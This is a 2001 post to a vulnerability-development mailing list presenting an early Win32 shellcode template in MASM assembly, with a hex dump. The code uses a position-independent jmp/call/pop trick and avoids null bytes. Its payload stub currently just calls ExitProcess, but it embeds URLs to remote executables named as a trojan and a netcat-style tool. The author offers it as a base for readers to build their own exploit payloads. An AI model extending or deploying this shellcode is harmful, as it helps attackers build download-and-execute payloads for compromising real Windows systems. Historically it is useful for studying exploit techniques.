From: Enrique A. Compañ Gzz. [enrique@virtekweb.net]
Sent: Thursday, September 06, 2001 8:31 PM
To: vuln-dev@securityfocus.com
Subject: Small win32 shellcode demo

This is an ultra early demo of the new shellcode I'm developing, designed to
be fast & small & polymorphic, without
hard coded values.

I have a previous version of a finished shellcode like this one, I'll
release it soon...

The Shell Code :
-----------------------------

This code was developed with masm32.

This is only the base of the shellcode, it can be used to develop your own
stuff.

Features:

* No need to know the address of our code, no need to have the address in a
register, no matter what technique
  you use to exploit the buffer (shellcode in the buffer,  shellcode after
EIP, jump back... etc)
* No Nulls
* Fast & Small

You can even compile this code and run the EXE and it will run and terminate
normally... (nice ;-))

.386                                                            ; Next time
we'll be using 586 code..... optimize!

.model flat, stdcall

include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib

EXITPROCESS_ADDR            EQU     077E8F32Dh               ; We'll take
rid of this later ;-)

.code

shell_code_start:

        jmp pi_offset                   ; Jump to call back function

call_back:

        pop esi                         ; ESI now points to the first
variable (in this case "url"), no matter the size of the "real_code",
                                            ; ESI will always point there
real_code_start:

        xor eax, eax                                        ; Our real code
begins here...
        push eax
        mov eax, EXITPROCESS_ADDR
        call eax                                               ; Do nothing
but call ExitProcess with a hard-coded value (just for testing)

real_code_end:

pi_offset:
        call near ptr call_back         ; Return and push the address

vars_start:

        url db "http://box.org/trojen.exe", 0ffh      ; Just a var

end shell_code_start


000001F4 0000 0000 0000 0000 0000 0000 EB0B 5E33 C050 B82D
..............^3.P.-
00000208 F3E8 77FF D0E8 F0FF FFFF 6874 7470 3A2F 2F77 7777
..w.......http://www
0000021C 2E76 6972 7465 6B77 6562 2E6E 6574 2F6E 6378 3939
.virtekweb.net/ncx99
00000230 2E65 7865 FF00
.exe..

I've seen variations of this technique... but this one is just fine, it has
the qualities of a good s-code.

Oh yeah... I recommend you to use TASM32 or MASM32.

BTW I'm collecting some references about this stuff you'll find very
useful...I'll give them away soon.

My stuff to come...

Enrique A. Compañ Gzz.
Virtek Labs

Greets: RaiSe, Undersec Team , Net-Search E-Zine, the lists ;-) and all the
rest...